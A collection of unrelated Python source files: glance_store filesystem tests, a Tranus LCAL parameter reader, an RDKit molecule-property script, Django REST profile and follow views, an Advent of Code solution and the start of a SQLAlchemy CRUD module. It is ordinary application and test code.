self.assertEqual(expected_multihash, multihash)
loc = location.get_location_from_uri(expected_location,
conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_add_with_multiple_dirs_storage_full(self):
"""
Test StorageFull exception is raised if no filesystem directory
is found that can store an image.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure_add()
def fake_get_capacity_info(mount_point):
return 0
with mock.patch.object(self.store, '_get_capacity_info') as capacity:
capacity.return_value = 0
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
self.assertRaises(exceptions.StorageFull,
self.store.add,
expected_image_id,
image_file,
expected_file_size,
self.hash_algo)
def test_configure_add_with_file_perm(self):
"""
Tests filesystem specified by filesystem_store_file_perm
are parsed correctly.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 700, # -rwx------
group='glance_store')
self.store.configure_add()
self.assertEqual(self.store.datadir, store)
def test_configure_add_with_unaccessible_file_perm(self):
"""
Tests BadStoreConfiguration exception is raised if an invalid
file permission specified in filesystem_store_file_perm.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 7, # -------rwx
group='glance_store')
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_add_with_file_perm_for_group_other_users_access(self):
"""
Test that we can add an image via the filesystem backend with a
required image file permission.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 744, # -rwxr--r--
group='glance_store')
# -rwx------
os.chmod(store, 0o700)
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
self.store.configure_add()
filesystem.Store.WRITE_CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, location)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
# -rwx--x--x for store directory
self.assertEqual(0o711, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
# -rwxr--r-- for image file
mode = os.stat(expected_location[len('file:/'):])[stat.ST_MODE]
perm = int(str(self.conf.glance_store.filesystem_store_file_perm), 8)
self.assertEqual(perm, stat.S_IMODE(mode))
def test_add_with_file_perm_for_owner_users_access(self):
"""
Test that we can add an image via the filesystem backend with a
required image file permission.
"""
store = self.useFixture(fixtures.TempDir()).path
self.conf.set_override('filesystem_store_datadir', store,
group='glance_store')
self.conf.set_override('filesystem_store_file_perm', 600, # -rw-------
group='glance_store')
# -rwx------
os.chmod(store, 0o700)
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
self.store.configure_add()
filesystem.Store.WRITE_CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, location)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
# -rwx------ for store directory
self.assertEqual(0o700, stat.S_IMODE(os.stat(store)[stat.ST_MODE]))
# -rw------- for image file
mode = os.stat(expected_location[len('file:/'):])[stat.ST_MODE]
perm = int(str(self.conf.glance_store.filesystem_store_file_perm), 8)
self.assertEqual(perm, stat.S_IMODE(mode))
def test_configure_add_chunk_size(self):
# This definitely won't be the default
chunk_size = units.Gi
self.config(filesystem_store_chunk_size=chunk_size,
group="glance_store")
self.store.configure_add()
self.assertEqual(chunk_size, self.store.chunk_size)
self.assertEqual(chunk_size, self.store.READ_CHUNKSIZE)
self.assertEqual(chunk_size, self.store.WRITE_CHUNKSIZE)
|
#! /usr/bin/env python
from pytranus.support import TranusConfig
from pytranus.support import BinaryInterface
import numpy as np
import logging
import sys
import os.path
def line_remove_strings(L): # takes the lines of section 2.1 L1E, and returns a line without strings
return [x for x in L if is_float(x)]
def is_float(s):
''' little functions to verify if a string can be converted into a number '''
try:
float(s)
return True
except ValueError:
return False
class LcalParam:
'''LcalParam class:
This class is meant to read all the Tranus LCAL input files, and store
the lines in local variables.
'''
def __init__(self, t, normalize = True):
'''LcalParam(tranusConfig)
Constructor of the class, this object has a local variable for each of the
Tranus lines relevants to LCAL.
Parameters
----------
tranusConfig : TranusConfig object
The corresponding TranusConfig object of your project.
Class Attributes
----------------
list_zones: list
List of zones.
list_zones_ext: list
List of external zones.
nZones: integer (len(list_zones))
Number of zones in list_zones.
list_sectors: list
List of Economical Sectors.
nSectors: integer (len(list_sectors))
Number of Economical Sectors.
housingSectors: 1-dimensional ndarray
Subset of list_sectors including the land-use housing sectors.
substitutionSectors: 1-dimensional ndarray
Subset of list_sectors that have substitution.
Variables from L0E section 1.1, and their corresponding initialized value:
ExogProd = np.zeros((nSectors,nZones))
Exogenous base-year Production X* for each sector and zone.
InduProd = np.zeros((nSectors,nZones))
Induced base-year Production X_0 for each sector and zone.
ExogDemand = np.zeros((nSectors,nZones))
Exogenous Demand for each sector and zone.
Price = np.zeros((nSectors,nZones))
Base-year prices for each sector and zone.
ValueAdded = np.zeros((nSectors,nZones))
Value Added for each sector and zone.
Attractor = np.zeros((nSectors,nZones))
Attractors W^n_i for each sector and zone.
Rmin = np.zeros((nSectors,nZones))
Lower limit to production, is not used in LCAL.
Rmax = np.zeros((nSectors,nZones))
Upeer limit to production, is not used in LCAL.
Variables from L1E section 2.1:
alfa = np.zeros(nSectors)
Exponent in the Attractor formula.
beta = np.zeros(nSectors)
Dispersion parameter in Pr^n_{ij}
lamda = np.zeros(nSectors)
Marginal Localization Utility of price.
thetaLoc = np.zeros(nSectors)
Exponent in normalization in Localization Utility, not used.
Variables from L1E section 2.2:
demax = np.zeros((nSectors,nSectors))
Elastic demand function max value, for housing consuming->land-use
sectors.
demin = np.zeros((nSectors,nSectors))
Elastic demand function min value, for housing consuming->land-use
sectors.
delta = np.zeros((nSectors,nSectors))
Disperion parameter in the demand function a^{mn}_i
Variables from L1E section 2.3:
sigma = np.zeros(nSectors)
Dispersion parameter in Substitution logit, no longer used.
thetaSub = np.zeros(nSectors)
Exponent in normalization in substitution logit, not used.
omega = np.zeros((nSectors,nSectors))
Relative weight in substitution logit.
Kn = np.zeros((nSectors,nSectors),dtype=int)
Set of possible substitution sectors.
Variables from L1E section 3.2:
bkn = np.zeros((nSectors,nSectors))
Coefficients of the attractor weight.
Disutil transport, monetary cost transport from C1S:
t_nij = np.zeros((nSectors,nZones,nZones))
Disutility of transportation between to zones for a given sector.
tm_nij = np.zeros((nSectors,nZones,nZones))
Monetary cost of transportation between to zones for a given sector.
'''
self.list_zones,self.list_zones_ext = t.numberingZones() # list of zones [1,2,4,5,8,....
self.nZones = len(self.list_zones) #number of zones: 225
self.sectors_names = [] #list of names of sectors (from file L1E)
self.list_sectors = t.numberingSectors() # list of sectors
self.nSectors = len(self.list_sectors) #number of sectors: 20
self.housingSectors = np.array([-1]) #array not initialized
self.substitutionSectors = np.array([-1]) #array not initialized
#Variables from L0E section 1.1
self.ExogProd = np.zeros((self.nSectors,self.nZones))
self.InduProd = np.zeros((self.nSectors,self.nZones))
self.ExogDemand = np.zeros((self.nSectors,self.nZones))
self.Price = np.zeros((self.nSectors,self.nZones))
self.ValueAdded = np.zeros((self.nSectors,self.nZones))
self.Attractor = np.zeros((self.nSectors,self.nZones))
self.Rmin = np.zeros((self.nSectors,self.nZones))
self.Rmax = np.zeros((self.nSectors,self.nZones))
#Variables from L1E s ection 2.1
self.alfa = np.zeros(self.nSectors)
self.beta = np.zeros(self.nSectors)
self.lamda = np.zeros(self.nSectors)
self.thetaLoc = np.zeros(self.nSectors)
#Variables from L1E section 2.2
self.demax = np.zeros((self.nSectors,self.nSectors))
self.demin = np.zeros((self.nSectors,self.nSectors))
self.delta = np.zeros((self.nSectors,self.nSectors))
#Variables from L1E section 2.3
self.sigma = np.zeros(self.nSectors)
self.thetaSub = np.zeros(self.nSectors)
self.omega = np.zeros((self.nSectors,self.nSectors))
self.Kn = np.zeros((self.nSectors,self.nSectors), dtype=int)
#Variables from L1E section 3.2
self.bkn = np.zeros((self.nSectors,self.nSectors))
#Disutil transport, monetary cost transport from C1S
self.t_nij = np.zeros((self.nSectors,self.nZones,self.nZones))
self.tm_nij = np.zeros((self.nSectors,self.nZones,self.nZones))
self.read_files(t)
if normalize:
self.normalize()
return
def read_files(self, t):
'''read_files(t)
Reads the files L0E, L1E and C1S to load the LCAL lines into the
Lcalparam object.
Parameters
----------
t : TranusConfig object
The TranusConfig file of your project.
Example
-------
You could use this method for realoading the lines from the files
after doing modifications.
>>>filename = '/ExampleC_n/'
>>>t = TranusConfig(nworkingDirectory = filename)
>>>param = Lcalparam(t)
>>>param.beta
array([ 0., 1., 1., 3., 0.])
#modify some parameter, for example:
>>>param.beta[2]=5
>>>param.beta
array([ 0., 1., 5., 3., 0.])
>>>param.read_files(t)
>>>param.beta
array([ 0., 1., 1., 3., 0.])
'''
print " Loading Lcal object from: %s"%t.workingDirectory
self.read_C1S(t)
self.read_L0E(t)
self.read_L1E(t)
return
def read_L0E(self,t):
'''read_LOE(t)
Reads the corresponding LOE file located in the workingDirectory.
Stores what is readed in local variables of the Lcalparam object.
This method is hardcoded, meaning that if the file structure of the
LOE file changes, probably this method needs to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
filename=os.path.join(t.workingDirectory,t.obs_file)
logging.debug("Reading Localization Data File (L0E), [%s]", filename)
filer = open(filename, 'r')
lines = filer.readlines()
filer.close()
length_lines = len(lines)
for i in range(length_lines):
lines[i]=str.split(lines[i])
""" Section that we are interested in. """
string = "1.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
""" End of section. This is horribly harcoded as we depend
on the format of the Tranus lines files and we don't have any control
over it. Also, this format will probably change in the future, hopefully
to a standarized one.
"""
end_of_section = "*-"
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1])) #n,i=sector,zone
self.ExogProd[n,i] =lines[line][2]
self.InduProd[n,i] =lines[line][3]
self.ExogDemand[n,i] =lines[line][4]
self.Price[n,i] =lines[line][5]
self.ValueAdded[n,i] =lines[line][6]
self.Attractor[n,i] =lines[line][7]
line+=1
""" Filter sectors """
string = "2.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
self.ExogDemand[n,i] =lines[line][2]
line+=1
string = "2.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
self.Rmin[n,i] =lines[line][2]
self.Rmax[n,i] =lines[line][3]
line+=1
string = "3."
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2 #puts you in the first line for reading
list_housing=[]
while lines[line][0][0:2] != end_of_section:
n,i=self.list_sectors.index(float(lines[line][0])),self.list_zones.index(float(lines[line][1]))
if n not in list_housing:
list_housing.append(n)
self.Rmin[n,i] =lines[line][2]
self.Rmax[n,i] =lines[line][3]
line+=1
self.housingSectors=np.array(list_housing)
return
def read_C1S(self,t):
'''read_C1S(t)
Reads COST_T.MTX and DISU_T.MTX files generated using ./mats from the
C1S file. Normally, this files are created when you first create your
TranusConfig file.
Stores what is readed in local variables of the LCALparam object.
This method is hardcoded, meaning that if the file structure of the
COST_T.MTX and DISU_T.MTX file changes, probably this method needs
to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
interface = BinaryInterface(t)
if not os.path.isfile(os.path.join(t.workingDirectory,"COST_T.MTX")):
logging.debug(os.path.join(t.workingDirectory,"COST_T.MTX")+': not found!')
logging.debug("Creating Cost Files with ./mats")
if interface.runMats() != 1:
logging.error('Generating Disutily files has failed')
return
#Reads the C1S file using mats
#this is hardcoded because we are using intermediate files DISU_T.MTX and COST_T.MTX
path = t.workingDirectory
logging.debug("Reading Activity Location Parameters File (C1S) with Mats")
filer = open(os.path.join(path,"COST_T.MTX"), 'r')
lines = filer.readlines()
filer.close()
sector_line=4 #line where the 1st Sector is written
line=9 #line where the matrix begins
# print 'Zones: %s'%self.nZones
while line<len(lines):
n=int(lines[sector_line][0:4])
z = 0
while True:
param_line = (lines[line][0:4]+lines[line][25:]).split()
if len(param_line)==0:
break
try:
i=int(param_line[0])
aux_z = self.list_zones.index(i)
# print aux_z
except ValueError:
aux_z = z
# print '>> %s'%aux_z
if z < self.nZones:
self.tm_nij[self.list_sectors.index(n),aux_z,:] = param_line[1:self.nZones+1]
z+=1
line+=1
if line==len(lines):
break
sector_line=line+4
line+=9 #space in lines between matrices
filer = open(os.path.join(path,"DISU_T.MTX"), 'r')
lines = filer.readlines()
filer.close()
sector_line=4
line=9
while line<len(lines):
n=int(lines[sector_line][0:4])
z = 0
while True:
param_line = (lines[line][0:4]+lines[line][25:]).split()
if len(param_line)==0:
break
try:
i=int(param_line[0])
aux_z = self.list_zones.index(i)
# print aux_z
except ValueError:
aux_z = z
# print '>> %s'%aux_z
if z < self.nZones:
self.t_nij[self.list_sectors.index(n),aux_z,:] = param_line[1:self.nZones+1]
z+=1
line+=1
if line==len(lines):
break
sector_line=line+4
line+=9 #space in lines between matrices
return
def read_L1E(self,t):
'''read_L1E(t)
Reads the corresponding L1E file located in the workingDirectory.
Stores what is readed in local variables of the LCALparam object.
This method is hardcoded, meaning that if the file structure of the
L1E file changes, probably this method needs to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
filename=os.path.join(t.workingDirectory,t.scenarioId,t.param_file)
logging.debug("Reading Activity Location Parameters File (L1E), [%s]", filename)
filer = open(filename, 'r')
lines = filer.readlines()
filer.close()
length_lines = len(lines)
""" Section that we are interested in. """
string = "2.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
# print lines[line][3:6]
if (lines[line][3:6] == string):
break
""" End of section. This is horribly harcoded as we depend
on the format of the Tranus lines files and we don't have any control
over it. Also, this format will probably change in the future, hopefully
to a standarized one.
"""
end_of_section = "*-"
line+=3
# print 'line: %s'%line
while lines[line][0:2] != end_of_section:
# print lines[line]
param_line = line_remove_strings(lines[line].split()) #we remove the strings from each line!
n = self.list_sectors.index(float(param_line[0]))
self.sectors_names.append(lines[line][14:33].rstrip()[0:-1])
self.alfa[n] = param_line[6]
#print param_line
self.beta[n] = param_line[1]
self.lamda[n] = param_line[3]
self.thetaLoc[n] = param_line[5]
line += 1
for i in range(length_lines):
lines[i]=str.split(lines[i])
string = "2.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
while lines[line][0][0:2] != end_of_section:
m,n=self.list_sectors.index(float(lines[line][0])),self.list_sectors.index(float(lines[line][1]))
self.demin[m,n]=lines[line][2]
self.demax[m,n]=lines[line][3]
if self.demax[m,n]==0:
self.demax[m,n]=self.demin[m,n]
self.delta[m,n]=lines[line][4]
line+=1
string = "2.3"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
n=0
list_sub_sectors=[]
while lines[line][0][0:2] != end_of_section:
if len(lines[line])==5:
n=self.list_sectors.index(float(lines[line][0]))
self.sigma[n] =lines[line][1]
self.thetaSub[n] =lines[line][2]
self.Kn[n,self.list_sectors.index(float(lines[line][3]))]=1
self.omega[n,self.list_sectors.index(float(lines[line][3]))]=lines[line][4]
list_sub_sectors.append(n)
if len(lines[line])==2:
self.Kn[n,self.list_sectors.index(int(lines[line][0]))]=1
self.omega[n,self.list_sectors.index(float(lines[line][0]))]=lines[line][1]
line+=1
self.substitutionSectors = np.array(list_sub_sectors)
string = "3.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
while lines[line][0][0:2] != end_of_section:
m,n=self.list_sectors.index(float(lines[line][0])),self.list_sectors.index(float(lines[line][1]))
self.bkn[m,n]=lines[line][2]
line+=1
return
def normalize(self, t = -1, tm = -1, P = -1):
'''normalize input variables of the utility'''
if t == -1:
t = 10**np.floor(np.log10(self.t_nij.max()))
if tm == -1:
tm = 10**np.floor(np.log10(self.tm_nij.max()))
if P == -1:
P = 10**np.floor(np.log10(self.Price[self.housingSectors,:].max()))
self.t_nij /= t
self.tm_nij /= tm
self.Price /= P
return
def __str__(self):
ex = """See class docstring"""
return ex
if __name__=="__main__":
pass
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Distributed under the terms of the MIT License.
"""
Script to populate the properties of all molecules in database.
Author: Andrew Tarzia
Date Created: 05 Sep 2018
"""
from os.path import exists
import sys
import glob
import json
from rdkit.Chem import AllChem as Chem
from rdkit.Chem import Descriptors
from rdkit.Chem.rdMolDescriptors import CalcNumRotatableBonds
from rdkit.Chem.GraphDescriptors import BertzCT
import IO
import rdkit_functions as rdkf
import plots_molecular as pm
import utilities
import chemcost_IO
def populate_all_molecules(
params,
redo_size,
redo_prop,
mol_file=None
):
"""
Populate all molecules in pickle files in directory.
"""
vdwScale = params['vdwScale']
boxMargin = params['boxMargin']
spacing = params['spacing']
show_vdw = params['show_vdw']
plot_ellip = params['plot_ellip']
N_conformers = int(params['N_conformers'])
MW_thresh = params['MW_thresh']
seed = int(params['seed'])
fail_list = IO.fail_list_read(
directory=params['molec_dir'],
file_name='failures.txt'
)
print(mol_file)
if mol_file is None:
molecule_list = glob.glob('*_unopt.mol')
else:
molecule_list = IO.read_molecule_list(mol_file)
print(f'{len(molecule_list)} molecules in DB.')
count = 0
for mol in sorted(molecule_list):
count += 1
name = mol.replace('_unopt.mol', '')
if name in fail_list:
continue
opt_file = name+'_opt.mol'
etkdg_fail = name+'_unopt.ETKDGFAILED'
diam_file = name+'_size.csv'
prop_file = name+'_prop.json'
smiles = rdkf.read_structure_to_smiles(mol)
# Check for generics.
if '*' in smiles:
IO.fail_list_write(
new_name=name,
directory=params['molec_dir'],
file_name='failures.txt'
)
fail_list.append(name)
continue
# Get molecular properties from 2D structure.
if not exists(prop_file) or redo_prop:
print(
f'>> calculating molecule descriptors of {mol}, '
f'{count} of {len(molecule_list)}'
)
prop_dict = {}
rdkitmol = Chem.MolFromSmiles(smiles)
rdkitmol.Compute2DCoords()
Chem.SanitizeMol(rdkitmol)
prop_dict['logP'] = Descriptors.MolLogP(
rdkitmol,
includeHs=True
)
prop_dict['logS'] = rdkf.get_logSw(rdkitmol)
prop_dict['Synth_score'] = rdkf.get_SynthA_score(rdkitmol)
prop_dict['NHA'] = rdkitmol.GetNumHeavyAtoms()
prop_dict['MW'] = Descriptors.MolWt(rdkitmol)
nrb = CalcNumRotatableBonds(rdkitmol)
nb = rdkitmol.GetNumBonds(onlyHeavy=True)
prop_dict['NRB'] = nrb
if nb == 0:
prop_dict['NRBr'] = 0.0
else:
prop_dict['NRBr'] = nrb / nb
prop_dict['bertzCT'] = BertzCT(rdkitmol)
prop_dict['purchasability'] = chemcost_IO.is_purchasable(
name=name,
smiles=smiles
)
with open(prop_file, 'w') as f:
json.dump(prop_dict, f)
# Get a 3D representation of all molecules using ETKDG.
chk1 = (not exists(opt_file) or redo_size)
if chk1 and not exists(etkdg_fail):
print(
f'>> optimising {mol}, '
f'{count} of {len(molecule_list)}'
)
rdkit_mol = rdkf.ETKDG(mol, seed=seed)
if rdkit_mol is not None:
rdkf.write_structure(opt_file, rdkit_mol)
# Only property to determine at the moment is the molecular
# size. This produces a csv for all conformers, which will be
# used in the analysis.
chk2 = (not exists(diam_file) or redo_size)
if chk2 and not exists(etkdg_fail):
print(
f'>> getting molecular size of {mol}, '
f'{count} of {len(molecule_list)}'
)
_ = rdkf.calc_molecule_diameter(
name,
smiles,
out_file=diam_file,
vdwScale=vdwScale,
boxMargin=boxMargin,
spacing=spacing,
MW_thresh=MW_thresh,
show_vdw=show_vdw,
plot_ellip=plot_ellip,
N_conformers=N_conformers,
rSeed=seed
)
del _
def main():
if (not len(sys.argv) == 6):
print("""
Usage: molecule_population.py param_file redo mol_file
param_file:
redo size:
t to overwrite SIZE of all molecules.
redo rest:
t to overwrite properties of all molecules.
plot:
t to plot distributions of molecule properties.
mol_file :
file name of list of molecules to allow for trivial
parallelisation, `f` if not specified, where all `mol`
files are populated.
""")
sys.exit()
else:
params = utilities.read_params(sys.argv[1])
redo_size = True if sys.argv[2] == 't' else False
redo_prop = True if sys.argv[3] == 't' else False
plot = True if sys.argv[4] == 't' else False
mol_file = None if sys.argv[5] == 'f' else sys.argv[5]
print('settings:')
print(' Molecule file:', mol_file)
print(
'populate the properties attributes for all '
'molecules in DB...'
)
populate_all_molecules(
params=params,
mol_file=mol_file,
redo_size=redo_size,
redo_prop=redo_prop,
)
if plot:
pm.mol_parity(
propx='logP',
propy='logS',
file='logPvslogS',
xtitle='logP',
ytitle='logS'
)
pm.mol_parity(
propx='NHA',
propy='Synth_score',
file=f"NHAvsSA_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='SAScore'
)
pm.mol_parity(
propx='NHA',
propy='logP',
file=f"NHAvslogP_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='logP'
)
pm.mol_parity(
propx='NHA',
propy='logS',
file=f"NHAvslogS_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='logS'
)
pm.mol_categ(
propx='purchasability',
propy='Synth_score',
file=f"purchvsSA_{params['file_suffix']}",
xtitle='is purchasable',
ytitle='SAscore'
)
pm.mol_categ(
propx='purchasability',
propy='bertzCT',
file=f"purchvsbCT_{params['file_suffix']}",
xtitle='is purchasable',
ytitle='BertzCT'
)
pm.mol_categ(
propx='purchasability',
propy='size',
file=f"purchvssize_{params['file_suffix']}",
xtitle='is purchasable',
ytitle=r'$d$ [$\mathrm{\AA}$]'
)
pm.mol_categ(
propx='size',
propy='bertzCT',
file=f"sizevsbCT_{params['file_suffix']}",
xtitle='can diffuse',
ytitle='BertzCT'
)
pm.mol_categ(
propx='size',
propy='Synth_score',
file=f"sizevsSA_{params['file_suffix']}",
xtitle='can diffuse',
ytitle='SAscore'
)
pm.mol_all_dist(plot_suffix=params['file_suffix'])
if __name__ == "__main__":
main()
|
from django.shortcuts import render
from rest_framework.generics import ListAPIView, RetrieveUpdateAPIView
from .serializers import (
GetUserProfileSerializer, UpdateProfileSerializer, FavoriteArticleSerializer, FollowSerializer
)
from rest_framework import generics, viewsets
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from rest_framework.views import APIView
from rest_framework import status
from .models import UserProfile, Follow
from authors.apps.authentication.models import User
from rest_framework.exceptions import NotFound
from ..articles.models import Article
class UserProfiles(ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = UserProfile.objects.all()
serializer_class = GetUserProfileSerializer
class Updateprofile(RetrieveUpdateAPIView):
permission_classes = (IsAuthenticated,)
queryset = UserProfile.objects.all()
serializer_class = UpdateProfileSerializer
def update(self, request):
serializer = self.serializer_class(
request.user.userprofile, data=request.data)
serializer.is_valid(raise_exception=True)
serializer.update(request.user.userprofile, request.data)
return Response(serializer.data)
def get(self, request):
serializer = self.serializer_class(request.user.userprofile)
return Response(serializer.data)
class FavoriteArticle(RetrieveUpdateAPIView):
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FavoriteArticleSerializer
queryset = Article.objects.all()
def update(self, request, slug):
try:
serializer_instance = self.queryset.get(slug=slug)
except Article.DoesNotExist:
return Response('An article with this slug does not exist.', status.HTTP_404_NOT_FOUND)
userprofile_obj = request.user.userprofile
if slug in userprofile_obj.favorite_article:
userprofile_obj.favorite_article.remove(slug)
userprofile_obj.save()
return Response("unfavorited!")
userprofile_obj.favorite_article.append(slug)
userprofile_obj.save(update_fields=['favorite_article'])
return Response("favorited!")
class FollowsView(APIView):
permission_classes = (IsAuthenticated,)
def post(self, request, username):
follower_id = User.objects.get(username=request.user.username).id
try:
followed_id = User.objects.get(username=username).id
self.profile_id = UserProfile.objects.get(user_id=followed_id).id
self.verify_following_criteria_met(
follower_id, followed_id, username)
except Exception as e:
if isinstance(e, User.DoesNotExist):
raise NotFound('No user with name {} exists.'.format(username))
return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)
follow_data = {'follower': follower_id, 'followed': self.profile_id}
serializer = FollowSerializer(data=follow_data)
serializer.is_valid(raise_exception=True)
serializer.save()
profile = self.get_followed_profile(self.profile_id)
return Response(profile, status=status.HTTP_201_CREATED)
def verify_following_criteria_met(self, follower_id, followed_id, name):
if follower_id == followed_id:
raise Exception('You cannot follow your own profile.')
query_result = Follow.objects.filter(
follower_id=follower_id, followed_id=self.profile_id)
if len(query_result) != 0:
raise Exception('Already following {}.'.format(name))
def get_followed_profile(self, followed):
profile = UserProfile.objects.get(id=followed)
serializer = GetUserProfileSerializer(profile)
profile = serializer.data
profile['following'] = True
return profile
def delete(self, request, username):
user_id = User.objects.get(username=request.user.username).id
try:
followed_id = User.objects.get(username=username).id
profile_id = UserProfile.objects.get(user_id=followed_id).id
follow = Follow.objects.filter(
follower_id=user_id, followed_id=profile_id)
if len(follow) == 0:
raise Exception(
'Cannot unfollow a user you are not following.')
follow.delete()
return Response(
{'message': 'Successfully unfollowed {}.'.format(username)},
status=status.HTTP_204_NO_CONTENT
)
except Exception as e:
if isinstance(e, User.DoesNotExist):
return Response(
{'error': 'No user with name {} exists.'.format(username)},
status=status.HTTP_400_BAD_REQUEST
)
return Response(
{'error': str(e)}, status=status.HTTP_400_BAD_REQUEST
)
def get(self, request, username):
try:
user_id = User.objects.get(username=username).id
except:
raise NotFound('No user with name {} exists.'.format(username))
follows = Follow.objects.filter(follower_id=user_id)
serializer = FollowSerializer(follows, many=True)
following = list()
for follow in serializer.data:
user_id = UserProfile.objects.get(id=follow['followed']).user_id
username = User.objects.get(id=user_id).username
following.append(username)
return Response({'following': following}, status=status.HTTP_200_OK)
class FollowersView(APIView):
permission_classes = (IsAuthenticated,)
def get(self, request, username):
try:
user_id = User.objects.get(username=username).id
except:
raise NotFound('No user with name {} exists.'.format(username))
profile_id = UserProfile.objects.get(user_id=user_id).id
followers = Follow.objects.filter(followed_id=profile_id)
serializer = FollowSerializer(followers, many=True)
followers = list()
for follow in serializer.data:
username = User.objects.get(id=follow['follower']).username
followers.append(username)
return Response({'followers': followers}, status=status.HTTP_200_OK)
|
import copy
import sys
with open('assets/day11.txt', 'r') as file:
lines = [line for line in file.read().splitlines()]
octopuses = {}
for y in range(len(lines)):
for x in range(len(lines)):
octopuses[(x, y)] = int(lines[y][x])
def count_flashes(steps: int, break_on_synchronized: bool = False) -> int:
current_octopuses = copy.deepcopy(octopuses)
directions = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1)]
flashes = 0
for step in range(steps):
for coordinate in current_octopuses.keys():
current_octopuses[coordinate] += 1
flashed = []
while 0 != len([e for c, e in current_octopuses.items() if 9 < e and c not in flashed]):
for coordinate in current_octopuses.keys():
if 9 < current_octopuses[coordinate] and coordinate not in flashed:
neighbors = [tuple(c + d for c, d in zip(coordinate, direction)) for direction in directions]
for neighbor in neighbors:
try:
current_octopuses[neighbor] += 1
except KeyError:
pass
flashed.append(coordinate)
flashes += 1
if break_on_synchronized and len(flashed) == len(current_octopuses):
return step + 1
for coordinate, energy in current_octopuses.items():
if 9 < energy:
current_octopuses[coordinate] = 0
return flashes
print(f"Number of flashes after 100 steps: {count_flashes(100)}")
print(f"Number of flashes after 100 steps: {count_flashes(sys.maxsize, True)}")
|
from .bayescorr import bayesian_correlation
from .best import one_sample_best, two_sample_best
from .bms import bms
from .ttestbf import one_sample_ttestbf, two_sample_ttestbf
|
""" CRUD operations for management of resources
"""
import logging
import datetime
from typing import List
from sqlalchemy import or_
from sqlalchemy.orm import Session
from app.db.models import (
ProcessedModelRunUrl, PredictionModel, PredictionModelRunTimestamp, PredictionModelGridSubset,
ModelRunGridSubsetPrediction)
logger = logging.getLogger(__name__)
LATLON_15X_15 = 'latlon.15x.15'
def get_most_recent_model_run(
